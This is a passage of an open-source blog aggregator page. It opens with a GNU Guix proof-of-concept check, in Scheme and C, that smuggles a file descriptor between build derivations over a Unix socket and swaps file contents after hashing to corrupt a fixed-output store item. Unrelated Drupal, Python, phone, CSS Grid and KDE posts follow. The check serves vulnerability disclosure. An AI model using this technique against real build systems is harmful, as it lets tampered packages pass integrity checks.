fd = open(getenv(\"out\"), O_RDWR | O_CREAT, 0640); memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int)); msg.msg_controllen = CMSG_SPACE(sizeof(int)); // Write a single null byte too. msg.msg_iov = malloc(sizeof(struct iovec)); msg.msg_iov[0].iov_base = \"\"; msg.msg_iov[0].iov_len = 1; msg.msg_iovlen = 1; // Send it to the othher side of this connection. res = sendmsg(sock, &msg, 0); if (res < 0) perror(\"sendmsg\"); int buf; // Wait for the server to close the socket, implying that it has // received the commmand. recv(sock, (void *)&buf, sizeof(int), 0); }")) (define receiver-source (mixed-text-file "receiver.c" " #include <sys/socket.h> #include <sys/un.h> #include <stdlib.h> #include <stddef.h> #include <stdio.h> #include <unistd.h> #include <sys/inotify.h> int main(int argc, char **argv) { int sock = socket(AF_UNIX, SOCK_STREAM, 0); // Bind to the socket. struct sockaddr_un data; data.sun_family = AF_UNIX; data.sun_path[0] = 0; strcpy(data.sun_path + 1, \"dihutenosa\"); int res = bind(sock, (const struct sockaddr *)&data, offsetof(struct sockaddr_un, sun_path) + strlen(\"dihutenosa\") + 1); if (res < 0) perror(\"bind\"); res = listen(sock, 1); if (res < 0) perror(\"listen\"); while (1) { setvbuf(stdout, NULL, _IOLBF, 0); printf(\"accepting connections...\\n\"); int a = accept(sock, 0, 0); if (a < 0) perror(\"accept\"); struct msghdr msg = {0}; msg.msg_control = malloc(128); msg.msg_controllen = 128; // Receive the file descriptor as sent by the smuggler. recvmsg(a, &msg, 0); struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg); while (hdr) { if (hdr->cmsg_level == SOL_SOCKET && hdr->cmsg_type == SCM_RIGHTS) { int res; // Grab the copy of the file descriptor. memcpy((void *)&res, CMSG_DATA(hdr), sizeof(int)); printf(\"preparing our hand...\\n\"); ftruncate(res, 0); // Write the expected contents to the file, tricking Nix // into accepting it as matching the fixed-output hash. write(res, \"hello, world\\n\", strlen(\"hello, world\\n\")); // But wait, the file is bigger than this! What could // this code hide? // First, we do a bit of a hack to get a path for the // file descriptor we received. This is necessary because // that file doesn't exist in our mount namespace! char buf[128]; sprintf(buf, \"/proc/self/fd/%d\", res); // Hook up an inotify on that file, so whenever Nix // closes the file, we get notified. int inot = inotify_init(); inotify_add_watch(inot, buf, IN_CLOSE_NOWRITE); // Notify the smuggler that we've set everything up for // the magic trick we're about to do. close(a); // So, before we continue with this code, a trip into Nix // reveals a small flaw in fixed-output derivations. When // storing their output, Nix has to hash them twice. Once // to verify they match the \"flat\" hash of the derivation // and once more after packing the file into the NAR that // gets sent to a binary cache for others to consume. And // there's a very slight window inbetween, where we could // just swap the contents of our file. But the first hash // is still noted down, and Nix will refuse to import our // NAR file. To trick it, we need to write a reference to // a store path that the source code for the smuggler drv // references, to ensure it gets picked up. Continuing... // Wait for the next inotify event to drop: read(inot, buf, 128); // first read + CA check has just been done, Nix is about // to chown the file to root. afterwards, refscanning // happens... // Empty the file, seek to start. ftruncate(res, 0); lseek(res, 0, SEEK_SET); // We swap out the contents! static const char content[] = \"This file has been corrupted!\\n\"; write(res, content, strlen (content)); close(res); printf(\"swaptrick finished, now to wait..\\n\"); return 0; } hdr = CMSG_NXTHDR(&msg, hdr); } close(a); } }")) (define nonce (string-append "-" (number->string (car (gettimeofday)) 16) "-" (number->string (getpid)))) (define original-text "This is the original text, before corruption.") (define derivation-that-exfiltrates-fd (computed-file (string-append "derivation-that-exfiltrates-fd" nonce) (with-imported-modules '((guix build utils)) #~(begin (use-modules (guix build utils)) (invoke #+(compiled-c-code "sender" sender-source)) (call-with-output-file #$output (lambda (port) (display #$original-text port))))) #:options `(#:hash-algo sha256 #:hash ,(sha256 (string->utf8 original-text))))) (define derivation-that-grabs-fd (computed-file (string-append "derivation-that-grabs-fd" nonce) #~(begin (open-output-file #$output) ;make sure there's an output (execl #+(compiled-c-code "receiver" receiver-source) "receiver")) #:options `(#:hash-algo sha256 #:hash ,(sha256 #vu8())))) (define check (computed-file "checking-for-vulnerability" #~(begin (use-modules (ice-9 textual-ports)) (mkdir #$output) ;make sure there's an output (format #t "This depends on ~a, which will grab the file descriptor and corrupt ~a.~%~%" #+derivation-that-grabs-fd #+derivation-that-exfiltrates-fd) (let ((content (call-with-input-file #+derivation-that-exfiltrates-fd get-string-all))) (format #t "Here is what we see in ~a: ~s~%~%" #+derivation-that-exfiltrates-fd content) (if (string=? content #$original-text) (format #t "Failed to corrupt ~a, \ your system is safe.~%" #+derivation-that-exfiltrates-fd) (begin (format #t "We managed to corrupt ~a, \ meaning that YOUR SYSTEM IS VULNERABLE!~%" #+derivation-that-exfiltrates-fd) (exit 1))))))) checkAbout GNU Guix

GNU Guix is a transactional package manager and an advanced distribution of the GNU system that respects user freedom. Guix can be used on top of any system running the Hurd or the Linux kernel, or it can be used as a standalone operating system distribution for i686, x86_64, ARMv7, AArch64, and POWER9 machines.

In addition to standard package management features, Guix supports transactional upgrades and roll-backs, unprivileged package management, per-user profiles, and garbage collection. When used as a standalone GNU/Linux distribution, Guix offers a declarative, stateless approach to operating system configuration management. Guix is highly customizable and hackable through Guile programming interfaces and extensions to the Scheme language.

Categories: FLOSS Project Planets

Drupal Association blog: Why You Should Attend Open Source Conferences 

Planet Drupal - Tue, 2024-03-12 10:00

Network, Learn, and Collaborate - The three key motivations for individuals and organizations to participate in conferences. Every regular conference has a theme or niche that serves as a focal point for discussions and advancement. These events serve as stages for personal branding and business promotion, with attendees aiming to gain insights and contacts that directly benefit their individual goals and organizational interests. 

Although open-source events rely on these key motivations too, they have a unique flavor of community spirit and collaboration that’s not found in traditional conferences. Open source events like DrupalCons thrive on shared knowledge, transparent innovation, and a sense of collective growth.

What is DrupalCon? 

DrupalCon is an annual open-source conference that brings together open-source enthusiasts, developers, designers, and end users for networking, learning, and collaboration, all under one roof. This is where you can meet the people who made the software, get inspired, and actively contribute to the project. The next upcoming DrupalCon North America event is being held in Portland, Oregon, from 06 May 2024 to 09 May 2024. We’ll give you some reasons why you should attend open-source events like DrupalCon 2024.

Benefits of Attending Open Source Conferences 

An open-source enthusiast knows that events like DrupalCons are celebrations of community-driven innovation. The energy is contagious, the ideas are limitless, and the camaraderie extends beyond the conference halls. 

Spirit of Open-Source

Open source is almost synonymous with collaboration. Collaboration by contributors who are the heartbeat of any open-source project. These events provide a platform for individuals and organizations to come together, contribute to the community, and drive the future of open source. It aligns with the open-source commitment to empowering innovation through the collective efforts of a vibrant and engaged community. In an event like DrupalCon, you get a chance to meet people who are passionate about Drupal and driving it forward. 

Career Boost

If you're launching your career or contemplating a switch to something more fulfilling, few experiences rival the rewards of joining an open-source community. And there’s no better place to kick off this journey than an open-source conference. You’re not just exploring job opportunities but also gaining the knowledge you need from training sessions and meaningful interactions with seasoned experts. You can also upgrade your skills through hands-on workshops and interactive sessions at the event. At DrupalCon, you can always find support if you’re new to the world of Drupal or Open source. A mentor will help guide you through your entire experience by suggesting what sessions you should attend for your professional development. You can even learn to make your first contribution to the project through your mentor.

Spot the Trend

Want to know what’s new in your area of interest? Open-source conferences are the best places to identify emerging trends, innovations, and shifts in the industry - much before they become mainstream! You come out well-equipped with insights into upcoming technologies and initiatives. This will not only help you in your professional development but also enable you to contribute meaningfully to innovative projects. All of this ultimately leads to improved user experiences and future-ready applications. At DrupalCon, immerse yourself in firsthand insights as Dries Buytaert, the founder himself, shares the current state of Drupal in his keynote (DriesNote). Discover upcoming initiatives and innovation on the horizon, and get a sneak peek into the exciting developments set to launch. 

The Power of Open Source Networking

We all know how powerful networking can be for your career or business development. But for an open-source community, networking is an indispensable aspect. It's impossible to have a successfully operating community without networking. Open-source events let you connect with like-minded individuals, developers, agencies, and contributors, fostering potential collaboration. Get mentorship, guidance, and exposure to new opportunities to aid your professional growth. Attend DrupalCon to connect with thousands of open-source enthusiasts and build meaningful connections with professionals just like you. Programs like BoFs (Birds of a Feather) at DrupalCon let you exchange information and share best practices around a common topic of interest. Make DrupalCon your opportunity to grow.

Real-World Learning

Learning from real-world scenarios truly refines your understanding of technology and innovation. Attending industry summits at open-source conferences is a great way to gain practical insights from industry leaders. It’s a chance to understand the real-world challenges faced by them and the practical solutions implemented. Through live demos, case studies, and applications, you can see the ropes in action. Industry summits often highlight the methodologies that are proving successful in the current landscape, providing actionable takeaways. DrupalCon has a full day dedicated to industry summits like the higher educational summit, non-profit summit, government summit and community summit. 

Final Thoughts

Whether it's networking opportunities, hands-on learning, or trend forecasting, open-source conferences offer a holistic approach to staying on top of ever-changing technologies. They contribute to the collective growth of the entire open-source community. It's an investment in continuous learning, professional enrichment, and the boundless possibilities of open collaboration. Did we mention that DrupalCons aren't just about coding and tech talk? There's a ton of fun to be had too! Take a look at the social events from last year

Categories: FLOSS Project Planets

Real Python: Python Basics Exercises: Dictionaries

Planet Python - Tue, 2024-03-12 10:00

In plain English, a dictionary is a book containing the definitions of words. Each entry in a dictionary has two parts: the word being defined, and its definition.

Python dictionaries, like lists and tuples, store a collection of objects. However, instead of storing objects in a sequence, dictionaries hold information in pairs of data called key-value pairs. That is, each object in a dictionary has two parts: a key and a value. Each key is assigned a single value, which defines the relationship between the two sets.

In this video course, you’ll practice:

  • What a dictionary is and how it’s structured
  • How dictionaries differ from other data structures
  • How to define and use dictionaries in your own code

This video course is part of the Python Basics series, which accompanies Python Basics: A Practical Introduction to Python 3. You can also check out the other Python Basics courses.

Note that you’ll be using IDLE to interact with Python throughout this course.

[ Improve Your Python With 🐍 Python Tricks 💌 – Get a short & sweet Python Trick delivered to your inbox every couple of days. >> Click here to learn more and see examples ]

Categories: FLOSS Project Planets

Matt Glaman: Drupal has made contributing to open source a marketing opportunity

Planet Drupal - Tue, 2024-03-12 09:18

Drupal has done something unique with contributing to open source. Our community has made contributing to the open source project a marketing opportunity for organizations using Drupal. Generally, contributing to open source projects reflects at the individual level. There isn't a great way to reflect if the individual did it out of some intrinsic value to improve open source or by sponsored work with their employer or a customer. As far as I know, Drupal is the only open source project providing this kind of attribution.

Categories: FLOSS Project Planets

ADCI Solutions: Speed up your website with React Server Components

Planet Drupal - Tue, 2024-03-12 07:09

The React team proposes a new way to improve page load speed and reduce TTI—the time it takes a page to become fully interactive.

***

One of the ways to improve website performance is to reduce traffic from the server to the user’s (client’s) device. The client-server architecture is essentially the queue of requests and responses between the client and the server, which in turn accesses the database.

Gradually, web development began to take on other tasks, such as where and how to cache the page or mark it up for SEO so that it could later go live and work for the user, or what part of the page rendering could be done by the client or by the server.

Eventually, there were developers who took the React library, built the Next framework around it, proposed the principle of Server-Side Rendering (or SSR) along with the framework.

Categories: FLOSS Project Planets

Russell Coker: Android vs FOSS Phones

Planet Debian - Tue, 2024-03-12 06:35

To achieve my aims regarding Convergence of mobile phone and PC [1] I need something a big bigger than the 4G of RAM that’s in the PinePhone Pro [2]. The PinePhonePro was released at the end of 2021 but has a SoC that was first released in 2016. That SoC seems to compare well to the ones used in the Pixel and Pixel 2 phones that were released in the same time period so it’s not a bad SoC, but it doesn’t compare well to more recent Android devices and it also isn’t a great fit for the non-Android things I want to do. Also the PinePhonePro and Librem5 have relatively short battery life so reusing Android functionality for power saving could provide a real benefit. So I want a phone designed for the mass market that I can use for running Debian.

PostmarketOS

One thing I’m definitely not going to do is attempt a full port of Linux to a different platform or support of kernel etc. So I need to choose a device that already has support from a somewhat free Linux system. The PostmarketOS system is the first I considered, the PostmarketOS Wiki page of supported devices [3] was the first place I looked. The “main” supported devices are the PinePhone (not Pro) and the Librem5, both of which are under-powered. For the “community” devices there seems to be nothing that supports calls, SMS, mobile data, and USB-OTG and which also has 4G of RAM or more. If I skip USB-OTG (which presumably means I’d have to get dock functionality via wifi – not impossible but not great) then I’m left with the SHIFT6mq which was never sold in Australia and the Xiomi POCO F1 which doesn’t appear to be available on ebay.

LineageOS

The libhybris libraries are a compatibility layer between Android and glibc programs [4]. Which includes running Wayland with Android display drivers. So running a somewhat standard Linux desktop on top of an Android kernel should be possible. Here is a table of the LineageOS supported devices that seem to have a useful feature set and are available in Australia and which could be used for running Debian with firmware and drivers copied from Android. I only checked LineageOS as it seems to be the main free Android build.

Phone RAM External Display Price Edge 20 Pro [5] 6-12G HDMI $500 not many on sale Edge S aka moto G100 [6] 6-8G HDMI $500 to $600+ Fairphone 4 6-8G USBC-DP $1000+ Nubia Red Magic 5G 8-16G USBC-DP $600+

The LineageOS device search page [9] allows searching by kernel version. There are no phones with a 6.6 (2023) or 6.1 (2022) Linux kernel and only the Pixel 8/8Pro and the OnePlus 11 5G run 5.15 (2021). There are 8 Google devices (Pixel 6/7 and a tablet) running 5.10 (2020), 18 devices running 5.4 (2019), and 32 devices running 4.19 (2018). There are 186 devices running kernels older than 4.19 – which aren’t in the kernel.org supported release list [10]. The Pixel 8 Pro with 12G of RAM and the OnePlus 11 5G with 16G of RAM are appealing as portable desktop computers, until recently my main laptop had 8G of RAM. But they cost over $1000 second hand compared to $359 for my latest laptop.

Fosdem had an interesting lecture from two Fairphone employees about what they are doing to make phone production fairer for workers and less harmful for the environment [11]. But they don’t have the market power that companies like Google have to tell SoC vendors what they want.

IP Laws and Practices

Bunnie wrote an insightful and informative blog post about the difference between intellectual property practices in China and US influenced countries and his efforts to reverse engineer a commonly used Chinese SoC [12]. This is a major factor in the lack of support for FOSS on phones and other devices.

Droidian and Buying a Note 9

The FOSDEM 2023 has a lecture about the Droidian project which runs Debian with firmware and drivers from Android to make a usable mostly-FOSS system [13]. It’s interesting how they use containers for the necessary Android apps. Here is the list of devices supported by Droidian [14].

Two notable entries in the list of supported devices are the Volla Phone and Volla Phone 22 from Volla – a company dedicated to making open Android based devices [15]. But they don’t seem to be available on ebay and the new price of the Volla Phone 22 is E452 ($AU750) which is more than I want to pay for a device that isn’t as open as the Pine64 and Purism products. The Volla Phone 22 only has 4G of RAM.

Phone RAM Price Issues Note 9 128G/512G 6G/8G <$300 Not supporting external display Galaxy S9+ 6G <$300 Not supporting external display Xperia 5 6G >$300 Hotspot partly working OnePlus 3T 6G $200 – $400+ photos not working

I just bought a Note 9 with 128G of storage and 6G of RAM for $109 to try out Droidian, it has some screen burn but that’s OK for a test system and if I end up using it seriously I’ll just buy another that’s in as-new condition. With no support for an external display I’ll need to setup a software dock to do Convergence, but that’s not a serious problem. If I end up making a Note 9 with Droidian my daily driver then I’ll use the 512G/8G model for that and use the cheap one for testing.

Mobian

I should have checked the Mobian list first as it’s the main Debian variant for phones.

From the Mobian Devices list [16] the OnePlus 6T has 8G of RAM or more but isn’t available in Australia and costs more than $400 when imported. The PocoPhone F1 doesn’t seem to be available on ebay. The Shift6mq is made by a German company with similar aims to the Fairphone [17], it looks nice but costs E577 which is more than I want to spend and isn’t on the officially supported list.

Smart Watches

The same issues apply to smart watches. AstereoidOS is a free smart phone OS designed for closed hardware [18]. I don’t have time to get involved in this sort of thing though, I can’t hack on every device I use.

Related posts:

  1. The Australian Open and Android Phones (Seer) On Monday the 25th of January 2010 I visited the...
  2. Dual SIM Phones vs Amaysim vs Contract for Mobile Phones Currently Dick Smith is offering two dual-SIM mobile phones for...
  3. Pixel 6A I have just bought a Pixel 6A [1] for my...
Categories: FLOSS Project Planets

Specbee: Better Page Layouts with the CSS Grid Layout Module in Drupal

Planet Drupal - Tue, 2024-03-12 05:06
Fed up with the hassle of finicky CSS positioning and floats for organizing your page layout? They don't always play nice with all browsers. It's time for a smoother solution! Let’s talk about the brand new module - CSS Grid or Grid Layout that brings a two-dimensional grid system to CSS. This grid-based layout system is a versatile way of organizing your content, with rows and columns, making it easier to design complex layouts. Check out the rest of the blog for insights on CSS Grid Layout and integrating the CSS Grid Layout Drupal module into your project. CSS Grid Terminology Similar to CSS Flexbox, where we have flex containers and flex items, in CSS Grid, we follow a similar concept with grid containers and grid items. To turn a container into a CSS Grid container, we simply set its display property to “Grid”. Grid Container: The grid container wraps all the grid items within its area. Grid Cell: Each individual item inside the grid container is referred to as a grid cell or grid item.A Grid layout forms a two-dimensional structure, with columns along the Y-axis and rows along the X-axis. Grid Line: The vertical and horizontal lines that divide the grid into columns and rows are called grid lines. They are automatically numbered for columns as well as for the rows starting from 1 all the way to the number of rows or columns plus 1. Grid Gap: The space between Grid cells is called a gutter or Grid Gap. Grid Track: Grid items aligned in a row or column are referred to as a grid track. For horizontal alignment, we use the term "row track," and for vertical alignment, it's called a "column track." Grid Area: The area between two vertical and horizontal lines is called grid area. Demonstration of row and column values and properties HTML <div class="wrapper"> <div class="header">Header</div> <div class="box-1">Box 1</div> <div class="box-2">Box 2</div> <div class="box-3">Box 3</div> <div class="main-content">Main Content</div> <div class="sidebar">Sidebar</div> <div class="footer">Footer</div> </div>CSS .wrapper{ display: grid; grid-template-rows: 100px 200px 400px 100px; grid-template-columns: repeat(3, 1fr) minmax(200px, 1fr); grid-gap: 30px; // Line names grid-template-rows: 100px [box-start] 200px [box-end content-start] 400px [content-end] 100px; // Grid area names grid-template-areas: "head head head ." "box1 box2 box3 side" "main main main side" "foot foot foot foot"; } // Using Line numbers .header{ grid-column: 1 / -1; } .main-content{ grid-row: 3 / 4; grid-column: 1 / 4; } // Using Line Names .sidebar{ grid-row: box-start / content-end; } // Using Grid Area Names .footer{ grid-column: foot; }Grid Properties For making an element a grid container, we use display:grid grid-template-row - Defines the number of rows in a grid layout. grid-template-column - Defines the number of columns in a grid layout. row-gap & column-gap - Defines the gap between grid row and grid column individually. grid-gap - Defines the gap between both rows and columns respectively in a grid layout. The Repeat function -  It is employed to express a recurring segment of the tracklist, enabling the concise notation of a repetitive pattern for a substantial number of columns or rows. The Fr unit - A fractional unit that dynamically calculates layout divisions. With 1fr, you get one share of the available space within the grid. Naming Grid Lines - Give names to specific or all lines in your grid while defining it using the grid-template-rows and grid-template-columns properties. Naming Grid Areas - The grid-template-areas CSS property specifies named grid areas, establishing the cells in the grid and assigning them names. grid-row - The grid item's start and end position within the grid row. grid-columns - The grid item's start and end position within the grid column. min-content - The property specifies the intrinsic minimum width of the content. max-content - The property specifies the intrinsic maximum width or height of the content. minmax - Defines a size range greater than or equal to min and less than or equal to max content. Browser inspector view for grid - align and justify items and content HTML <div class="container"> <div class="item item--1">Modern</div> <div class="item item--2">CSS</div> <div class="item item--3">with</div> <div class="item item--4">Flexbox</div> <div class="item item--5">and</div> <div class="item item--6">Grid</div> <div class="item item--7">is</div> <div class="item item--8">Great</div> </div>CSS .container{ display: grid; grid-template-rows: repeat(2, 150px); grid-template-columns: repeat(2, 300px); grid-auto-flow: row; grid-auto-rows: 150px; grid-gap: 30px; // Aligning content in row direction align-content: center; // Aligning content in column direction Justify-content: center; // Aligning items in row direction align-items: center; // Aligning items in column direction justify-items: center; .item{ &--2{ grid-row: 2 / span 2; // Aligning item in row direction align-self: center; // Aligning item in column direction justify-self: center; } }align-items - Align Grid items inside the grid cell or area in the column/vertical axis. justify-items - Align Grid items inside the grid cell or area in the row/horizontal axis. align-self - Overrides the grid item's align-items value and aligns itself inside the cell/area in the column/vertical axis. justify-self - Overrides the grid item's justify-items value and aligns itself inside the cell/area row/horizontal axis. align-content - Specifies how the grid content is distributed along the column axis / vertically in a grid container. justify-content - Specifies how the grid content is distributed along the row axis / horizontally in a grid container. grid-auto-flow - The property regulates the direction in which auto-placed items are inserted into the grid, either in the row or column direction. The default value is row. grid-auto-rows - This property sets a size for the rows in a grid container. grid-auto-columns - The grid-auto-columns property sets a size for the columns in a grid container. auto-fill - This property fills rows with as many columns as possible, even if the added column is empty, occupying space in the row. Browser inspector view for grid auto-fill property auto-fit - It fills rows with as many columns as possible. It collapses empty cells, setting their width to 0 to prevent excess space. Browser inspector view for grid auto-fit property Implementing the Drupal CSS Grid layout module The Drupal CSS Grid Layout module seamlessly integrates the power of CSS Grid into your Drupal environment, providing a flexible and efficient way to structure and organize content. Installing the module Prerequisites: Layout builder Layout Discovery Install CSS Grid Layout module using - composer require 'drupal/css_grid:^1.0@beta'Next, enable the module here: Administration > extend Add a new layout builder page: Content → add content → Layout builder page → layout → Add section Now you have yourself a newly created layout CSS Grid. Choose CSS Grid, and you'll find options for columns, rows, and gaps, allowing you to create a dynamic grid layout. You can then incorporate column, row, and gap values according to the desired structure.   You can also choose from different CSS and grid layout units. Final Thoughts These are the fundamental aspects of the CSS Grid layout algorithm. Armed with this knowledge, you can construct intricate and interactive layouts, eliminating the reliance on CSS frameworks. For Drupal frontend developers, the integration of the CSS Grid Layout module adds an extra layer of flexibility and enables seamless implementation and customization of grid-based designs within Drupal. If you're ready to implement these cutting-edge design techniques into your Drupal website, explore our Drupal services for seamless integration and customization.
Categories: FLOSS Project Planets

DrupalEasy: Reintroducing Drupal core's Views "Combine fields filter"

Planet Drupal - Tue, 2024-03-12 04:16

I was recently reminded of a Drupal core feature that I hadn't used in a long time - and was pleasantly surprised at how useful it is.

The Combine fields filter Views filter allows a site-builder to quickly and easily set up an exposed filter that searches multiple fields for a given search term. Think of it as a way to combine multiple exposed search filters into a single search box.

Setting it up is quite easy - just include all the fields that you want to search in the Fields section, marking them with Exclude from display as necessary (Unfortunately, Combine fields filter doesn't work with view modes.)

Then, add and expose a Combine fields filter to the view, and configure it to use all the fields you want searchable in the Choose fields to combine for filtering section of the filter's configuration:

 

I created a simple example of a Movie content type with example fields including Title, Image, Plot summary, Spoilers, Year of release, Short description, Taglines, and Trivia. I added all of these fields to the Fields configuration of the view - with all of them hidden except for Title and Image.

Next, I added a Combine fields filter as described above, selecting all of the fields to be combined for filtering. Finally, I added a few sample Movie nodes.

To test things out, I searched for terms that were added as part of the various Movie content type fields (but purposely not words in the Title fields). The results were exactly what I was expecting!

In the first example, the word biff appears in the Plot summary field for Back to the Future

In the first example, the word biff appears in the Plot summary field for Back to the Future. Next, the word saga appears in the Short description field of The Last Jedi.The number 1985 appears in the Year of release field of Back to the Future.Finally, the words Michael Caine appear in the Trivia field of The Dark Knight


There are a few caveats when using Combine fields filter with one of the more impactful being that when utilizing a multivalued field (as the Trivia and Taglines fields are in the previous example), the Multiple field settings configuration cannot utilize the Display all values in the same row option. Fortunately, these fields are usually excluded (hidden) from search views like this. 

Categories: FLOSS Project Planets

PreviousNext: How can free open source CMSes remain competitive with enterprise clients?

Planet Drupal - Mon, 2024-03-11 23:52

With Drupal now heavily used in the enterprise market by very large organisations, much of its direct competition is from well-funded proprietary products. From the perspective of my role on the Drupal Association board, I gave a talk at FOSDEM in February 2024 on the strategies and initiatives the Drupal community is starting to put in place to remain competitive in the enterprise market and how these approaches can be shared by other open source projects. 

by Owen Lansbury / 12 March 2024

The original of this video recording was first published on the FOSDEM website

Drupal has historically had no centralised product management or marketing, let alone ANY coordinated budget! For comparison, Adobe spends around USD$2.7bn annually on product development, sales and marketing for its Experience Cloud product suite. 

In the talk, I discuss Drupal's recent recognition as a Digital Public Good and the way that the Drupal community is highly motivated by providing world-class software for free to anyone who wants to use it, promoting values of freedom, inclusion, participation and empowerment. The Drupal Association recently released a manifesto that defines the Drupal project's commitment to the Open Web, but in order to fulfil this mission, Drupal needs to be successful as a product in the open market.

Since Drupal 8 was released in 2015, it has been specifically targeted at building "ambitious digital experiences." While this has resulted in an overall drop in Drupal installs as smaller sites move to SAAS platforms, the Drupal economy is robust, with an estimated USD$3 billion spent on Drupal-related projects each year.

Unlike other open source projects, Drupal doesn’t have a single company doing the majority of the code contribution. The Drupal Association has run on a budget of around $3.5m or 1/1000th of the revenue being spent on Drupal projects each year. 

This was brought into focus for the Drupal Association during COVID when the primary source of income - running DrupalCon events - required an abrupt rethink. We had to refocus on how Drupal would be both successful and sustainable in the future. This has led to us recently embarking on a new strategy, where the Drupal Association play a more direct role in both Drupal product innovation and marketing.

Enterprise customers are key to maintaining a healthy ecosystem for a CMS. Their investment flows through to the agencies building, maintaining, supporting, and hosting large-scale projects, providing consistent, repeat income that ultimately benefits our open source community in the form of stable jobs, community funding, and sponsored code contribution. 

Looking more closely at the challenges of succeeding in the enterprise market, how do you get access and awareness with key decision makers in large organisations like the CIO, CTO and, increasingly, the CMO (Chief Marketing Officer)? They are the people likely to read analyst reports from Gartner and Forrester. While Acquia features as a leader in these reports and relies heavily on Drupal for its platform, Drupal's name recognition is largely absent from these reports. 

Acquia has also had great success with their Engage events that target key decision makers, but it's been a challenge to attract a similar audience to the more community and developer-focused DrupalCon events. 

While the Drupal Association itself has historically had limited relationships with Drupal's large end users, partner agencies who rely on Drupal's open source software for their clients absolutely do have these relationships.

The Drupal Association is in a strong position to provide our agency partners with as much assistance as possible to either retain or win new enterprise clients through any playbook-style information we can provide. For example, do we have a pitch deck on hand to help an agency argue why Drupal is superior to Adobe or Sitecore? Are there pre-packaged product demos that can be consistently updated to highlight new features?

This is an area where we currently fall short in the Drupal community, with most agencies replicating efforts for every new client engagement. It's something we're starting to address with the Drupal Certified Partner program, however, if we can harness the strength of hundreds of agency salespeople pitching Drupal to their clients every day. New agencies joining a partner program need to see a clear pathway to building their teams' expertise and being able to sell Drupal to their clients to grow their businesses. The largest global digital agencies have tended to struggle with engaging with open source software communities, so bridging that gap is critical.

The other group of people we need to convince in any large organisation are the people who’ll be using our product - the developers, content editors and systems engineers. C-level decision-makers lean heavily on this group to evaluate and make recommendations about what platform they should be considering. To influence this group, our product needs to look and function like a modern piece of software, fulfil contemporary requirements or be quickly downloadable for a working demo of the software.

In terms of where we already clearly win, rapid innovation is the thing that we do very well in the open source world. Maintaining the speed of innovation, though, is an area that has been harder for Drupal as both the software and community have matured. A big philosophical hurdle we’ve faced is the notion of the Drupal Association directing budget to innovation projects when people often have an expectation that contribution is “free”. But contribution has never been free! An individual or company has always borne the cost in personal time or wages. Other big open source projects have absolutely no stigma about funding projects with actual money, such as the Linux Foundation's $160m annual funding towards projects.

The Drupal community dipped our toe into this model last year with the Pitchburgh contest, which saw $98,000 worth of projects get completed in a relatively short amount of time because they had the budget. We’re also in the process of hiring people at the Drupal Association who can facilitate innovation and remove roadblocks to contribution.

Now, all we need is the funding to scale this model up. Imagine if just 1% of the $3bn spent on Drupal-related projects each year went towards funding strategic innovation - that would be a $30m budget to work with!

Similarly, the idea that Drupal would be “marketed” as a product by the Drupal Association has never been a core competency. This is the legacy of being structured as a 501c3 not-for-profit in the USA where funds are for the “advancement of a charitable cause”. Our charitable cause is ensuring Drupal remains a Digital Public Good that supports the United Nations’ Sustainable Development Goals. But if there isn't positive product awareness about Drupal in the broader market, then market share will slip and our ability to support the goals around being a Digital Public Good will suffer as a result. 

Whether we call it marketing or advocacy, we need to ensure Drupal as a product is commercially successful. We’ve had a Promote Drupal working group within the Drupal community for a number of years that has driven a range of broader marketing initiatives. The Drupal Association has now taken on an active role in this by commissioning a go-to-market strategy targeting the enterprise sector. This will be rolling out in 2024 as funding for specific marketing initiatives becomes available. 

At the cheaper end of the scale, this might include coordinating speakers at non-Drupal tech events or managing positive media coverage. At a higher budget scale, it might include Drupal-branded booths at major tech conferences, like the one we recently built for Web Summit in Lisbon, or running global campaigns to build Drupal product awareness. 

Our other huge advantage as an open source community is the strength and depth of our developer pool. We do encounter a perception issue when it comes to attracting younger developers to our platforms because there are so many shiny new things to play with. Building robust outreach, training, mentoring, certification and professional pathways is the key to maintaining a sustainable developer pool as those of us with 20+ years of experience head towards the other side of middle age.

So, where can you start to help with all of this? 

  1. If you're a professional services company that relies on Drupal for your business, get involved with the Drupal Certified Partner program. This is the fastest way to both contribute to Drupal's innovation as a product and play a direct role in driving adoption.

  2. If you rely on Drupal as your organization's CMS software, become a Supporting Partner and help fund Drupal's sustainability. 

  3. If you're passionate about maintaining the Open Web, the Drupal Association can accept your philanthropic donation

  4. Send your team members to DrupalCon or a regional DrupalCamp to connect with the community.

This level of engagement will help Drupal maintain its status as the platform of choice for large-scale projects.

Categories: FLOSS Project Planets

KDE Plasma 6.0.2, Bugfix Release for March

Planet KDE - Mon, 2024-03-11 20:00

Tuesday, 12 March 2024. Today KDE releases a bugfix update to KDE Plasma 6, versioned 6.0.2.

This release adds a week's worth of new translations and fixes from KDE's contributors. The bugfixes are typically small but important and include:

  • Fix sending window to all desktops. Commit. Fixes bug #482670
  • Folder Model: Handle invalid URL in desktop file. Commit. Fixes bug #482889
  • Fix panels being set to floating by upgrades. Commit.
View full changelog
Categories: FLOSS Project Planets

Pages